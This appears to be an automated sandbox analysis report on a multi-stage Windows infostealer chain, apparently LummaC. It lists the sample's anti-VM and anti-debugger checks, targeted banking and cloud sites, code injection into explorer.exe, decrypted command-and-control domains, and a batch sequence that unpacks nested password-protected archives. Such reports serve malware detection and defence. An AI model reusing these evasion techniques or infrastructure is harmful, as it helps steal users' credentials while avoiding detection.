Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PING.EXE, 00000022.00000002.3020216852.0000025BA81B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWY
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2113625183.0000000001419000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: PING.EXE, 0000001F.00000002.3016146593.000001A998B0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: skotes.exe, 00000005.00000002.3479841475.0000000001158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 53fe16f582.exe, 00000024.00000003.3167979092.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.0000000005813000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: skotes.exe, 00000005.00000002.3479841475.000000000116E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWI
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, skotes.exe.0.dr	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Process queried: DebugPort
Source: C:\Windows\explorer.exe	Process queried: DebugPort
Source: C:\Windows\explorer.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04F10DAB rdtsc

0_2_04F10DAB

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Code function: 7_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

7_2_00402665

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A0652B mov eax, dword ptr fs:[00000030h]	0_2_00A0652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A0A302 mov eax, dword ptr fs:[00000030h]	0_2_00A0A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0076A302 mov eax, dword ptr fs:[00000030h]	2_2_0076A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0076652B mov eax, dword ptr fs:[00000030h]	2_2_0076652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_0076A302 mov eax, dword ptr fs:[00000030h]	5_2_0076A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_0076652B mov eax, dword ptr fs:[00000030h]	5_2_0076652B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 3732 base: B99010 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 1244 base: 1034010 value: 00

LummaC encrypted strings found

Source: e66237da20.exe	String found in binary or memory: debonairnukk.xyz
Source: e66237da20.exe	String found in binary or memory: diffuculttan.xyz
Source: e66237da20.exe	String found in binary or memory: effecterectz.xyz
Source: e66237da20.exe	String found in binary or memory: deafeninggeh.biz
Source: e66237da20.exe	String found in binary or memory: immureprech.biz
Source: a98b6b83c7.exe, 00000025.00000003.3218093775.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: a98b6b83c7.exe, 00000025.00000003.3218093775.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: a98b6b83c7.exe, 00000025.00000003.3218093775.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: a98b6b83c7.exe, 00000025.00000003.3218093775.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: a98b6b83c7.exe, 00000025.00000003.3218093775.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: a98b6b83c7.exe, 00000025.00000003.3218093775.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: a98b6b83c7.exe, 00000025.00000003.3218093775.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: a98b6b83c7.exe, 00000025.00000003.3218093775.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: a98b6b83c7.exe, 00000025.00000003.3218093775.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sweepyribs.lat

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Thread register set: target process: 3732
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Thread register set: target process: 1244

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe "C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe "C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe "C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe "C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe "C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Code function: 7_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

7_2_00402744

Source: 3f0b27a17c.exe.5.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: e66237da20.exe, e66237da20.exe, 00000006.00000002.2940919654.0000000000376000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: RProgram Manager
Source: skotes.exe, skotes.exe, 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: QProgram Manager
Source: 53f7160658.exe, 00000023.00000002.3474334460.000000000082D000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: 5Program Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 5_2_0074DD91 cpuid

5_2_0074DD91

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

7_2_0040247D

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
